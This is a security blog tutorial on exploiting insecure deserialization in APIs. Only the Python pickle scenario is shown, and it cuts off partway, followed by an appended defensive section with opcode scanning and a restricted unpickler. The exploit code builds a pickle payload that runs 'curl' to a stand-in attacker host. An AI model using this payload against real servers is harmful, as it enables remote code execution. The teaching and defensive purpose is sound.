Hacking APIs: Exploit Insecure Deserialization

2 min read · Jun 19, 2025

Insecure Deserialization is a serious vulnerability that occurs when an API receives serialized data and deserializes it without verifying its content. If not handled securely, attackers can inject objects that execute code, change logic, or manipulate data.

This guide will walk you through three exploitation scenarios: one with Python, one with Java, and another with Node.js — all with real HTTP requests and server responses.

Python (Pickle-based API)

POST /api/v1/profile/upload_data

The frontend uploads profile data encoded in base64 (Pickle format).

Normal Request

POST /api/v1/profile/upload_data
Authorization: Bearer eyJhbGciOiJIUzI1Ni...
Content-Type: application/json

{
  "data": "gASVJgAAAAAAAAB9lCiMB3VzZXJfaWSUjAMxMjOlLg=="
}

Decoded from base64, this is the result of pickle.dumps({"user_id": "123"}).

Normal Response

{
  "message": "User data loaded successfully",
  "user_id": "123"
}

Exploit: Remote Command Execution

import pickle, os, base64

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl http://attacker.tld?owned=1",))

payload = base64.b64encode(pickle.dumps(Exploit()))…
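
The defensive side of the same endpoint, as an added example that is not code from the original article: it flags pickles that import or call anything without loading them, and loads profile data through an unpickler that refuses every global lookup. All names (`flagged_opcodes`, `load_profile`, `NoGlobalsUnpickler`, `Probe`) are hypothetical, and the sample payloads are constructed; the hostile stand-in calls a harmless builtin.

```python
import base64
import io
import pickle
import pickletools

# Opcodes that import or call objects; a plain dict of strings needs none of them.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every class or function lookup."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def flagged_opcodes(b64_data):
    """Detection: list dangerous opcodes without executing the pickle."""
    raw = base64.b64decode(b64_data, validate=True)
    return sorted({op.name for op, _, _ in pickletools.genops(raw)
                   if op.name in DANGEROUS_OPS})


def load_profile(b64_data):
    """Mitigation: only primitive containers can be loaded."""
    raw = base64.b64decode(b64_data, validate=True)
    profile = NoGlobalsUnpickler(io.BytesIO(raw)).load()
    if not isinstance(profile, dict) or not isinstance(profile.get("user_id"), str):
        raise ValueError("unexpected profile shape")
    return profile


class Probe:
    """Constructed stand-in for a hostile object; its callable is harmless."""

    def __reduce__(self):
        return (int, ("7",))


# Constructed sample inputs, shaped like the "data" field of the request above.
GOOD = base64.b64encode(pickle.dumps({"user_id": "123"}))
BAD = base64.b64encode(pickle.dumps(Probe()))
```

The opcode scan is suited to logging and alerting on incoming requests; the restricted unpickler is the control that actually blocks the load, and a data-only format such as JSON removes the problem for a payload this simple.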

Written by Israel Aráoz Severiche

{💀Cybersecurity Engineer​​🐞 } / { 🥋​ Purple Belt Brazilian Jiu Jitsu } / {🌐​https://twitter.com/iara0z}